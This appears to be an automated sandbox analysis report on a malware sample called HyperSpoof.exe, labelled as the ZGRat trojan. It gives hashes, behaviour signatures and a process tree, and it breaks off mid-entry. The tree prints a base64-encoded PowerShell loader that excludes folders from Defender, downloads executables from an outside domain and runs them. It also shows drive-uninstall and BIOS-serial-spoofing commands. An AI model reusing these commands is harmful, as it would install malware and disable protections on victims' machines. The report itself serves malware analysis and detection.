Analysis

  • max time kernel
    70s
  • max time network
    70s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    09-05-2024 01:19

Errors

Reason
Machine shutdown

General

  • Target

    HyperSpoof.exe

  • Size

    172KB

  • MD5

    ca27199cf4415233d9297b430dcf9924

  • SHA1

    8b21031c8e4a1c5c89c5a70b293cf401b08cb5a4

  • SHA256

    71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e

  • SHA512

    af5c81a1859a3786baff02aac13057f0261ac697209151ce6b8d39f37115d5a6bd471a9cd348d351382c0dd69a828628cf0b38c49f0b9c9ca498e3de539f16ac

  • SSDEEP

    1536:tZkNU8lY/Nz2M0SrbG8XbXUVF5486VQTGRhih2TKbWTwLpVD7ZTcXx:tZ8VA0mG8XbXw56xhi8TKJFA

Malware Config

Signatures

  • Detect ZGRat V1 4 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Nirsoft 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates connected drives 3 TTPs 30 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Maps connected drives based on registry 3 TTPs 30 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 60 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe
    "C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeQB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQB0AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBjAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwByAHYAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAcwBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHYAegB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAG4AZgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB3AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBnAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAdwBnAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAGcAYwB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB2AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABmAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBnAHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB3AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAGgAaAB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZgB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAeAB2AGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAZQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAGsAYwBwACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1932
      • C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
        "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1652
          • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
            C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB
            5⤵
            • Executes dropped EXE
            PID:2236
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1284
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2368
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2956
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2268
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2276
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1684
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2892
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2320
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:576
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:572
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3028
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2836
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1820
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2428
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Drops file in Windows directory
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:276
          • C:\ProgramData\Microsoft\Windows\DevManView.exe
            C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
            5⤵
            • Executes dropped EXE
            • Enumerates connected drives
            • Maps connected drives based on registry
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2408
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
          4⤵
          • Loads dropped DLL
          PID:1588
          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13721HP-TRGT24587AB
            5⤵
            • Executes dropped EXE
            PID:2028
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
          4⤵
            PID:2664
            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213724HP-TRGT2567RV
              5⤵
              • Executes dropped EXE
              PID:2676
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
            4⤵
              PID:2252
              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813724HP-TRGT2567SG
                5⤵
                • Executes dropped EXE
                PID:1656
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
              4⤵
                PID:1040
                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                  5⤵
                  • Executes dropped EXE
                  PID:548
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                4⤵
                  PID:2804
                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513724HP-TRGT2567SL
                    5⤵
                    • Executes dropped EXE
                    PID:536
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                  4⤵
                    PID:788
                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413724HP-TRGT2567FA
                      5⤵
                      • Executes dropped EXE
                      PID:1044
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                    4⤵
                      PID:2272
                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613724HP-TRGT2567FU
                        5⤵
                        • Executes dropped EXE
                        PID:1696
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                      4⤵
                        PID:844
                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313724HP-TRGT2567DQ
                          5⤵
                          • Executes dropped EXE
                          PID:1444
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                        4⤵
                          PID:1340
                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713724HP-TRGT2567MST
                            5⤵
                            • Executes dropped EXE
                            PID:1816
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                          4⤵
                            PID:1764
                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                              5⤵
                              • Executes dropped EXE
                              PID:1936
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                            4⤵
                              PID:1708
                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13743HP-TRGT1522AB
                                5⤵
                                • Executes dropped EXE
                                PID:2760
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                              4⤵
                                PID:1516
                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213743HP-TRGT1522RV
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2772
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                4⤵
                                  PID:1580
                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813743HP-TRGT1522SG
                                    5⤵
                                    • Executes dropped EXE
                                    PID:2636
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                  4⤵
                                    PID:1564
                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                      5⤵
                                      • Executes dropped EXE
                                      PID:2740
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                    4⤵
                                      PID:1700
                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513743HP-TRGT1522SL
                                        5⤵
                                        • Executes dropped EXE
                                        PID:2664
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                      4⤵
                                        PID:2656
                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413743HP-TRGT1522FA
                                          5⤵
                                          • Executes dropped EXE
                                          PID:2828
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                        4⤵
                                          PID:2820
                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613743HP-TRGT1522FU
                                            5⤵
                                            • Executes dropped EXE
                                            PID:1036
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                          4⤵
                                            PID:2576
                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313743HP-TRGT1522DQ
                                              5⤵
                                              • Executes dropped EXE
                                              PID:704
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                            4⤵
                                              PID:2676
                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713743HP-TRGT1522MST
                                                5⤵
                                                • Executes dropped EXE
                                                PID:3024
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                              4⤵
                                                PID:2684
                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:2252
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
                                                4⤵
                                                  PID:788
                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13760HP-TRGT22496AB
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:2220
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
                                                  4⤵
                                                    PID:1572
                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213760HP-TRGT22496RV
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:2288
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
                                                    4⤵
                                                      PID:844
                                                      • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813760HP-TRGT22496SG
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:2492
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                      4⤵
                                                        PID:1340
                                                        • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                          C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:796
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
                                                        4⤵
                                                          PID:1652
                                                          • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                            C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513760HP-TRGT22496SL
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:2480
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
                                                          4⤵
                                                            PID:556
                                                            • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                              C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413760HP-TRGT22496FA
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:2428
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
                                                            4⤵
                                                              PID:1300
                                                              • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613760HP-TRGT22496FU
                                                                5⤵
                                                                • Executes dropped EXE
                                                                PID:1600
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
                                                              4⤵
                                                                PID:2372
                                                                • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313760HP-TRGT22496DQ
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:2064
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
                                                                4⤵
                                                                  PID:2156
                                                                  • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                    C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713760HP-TRGT22496MST
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:1488
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                  4⤵
                                                                    PID:900
                                                                    • C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
                                                                      C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:1544
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: L6AF-IMA0
                                                                    4⤵
                                                                      PID:2704
                                                                      • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
                                                                        C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: L6AF-IMA0
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:2660
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: M8O7-8E3A
                                                                      4⤵
                                                                        PID:1712
                                                                        • C:\ProgramData\Microsoft\Windows\Volumeid64.exe
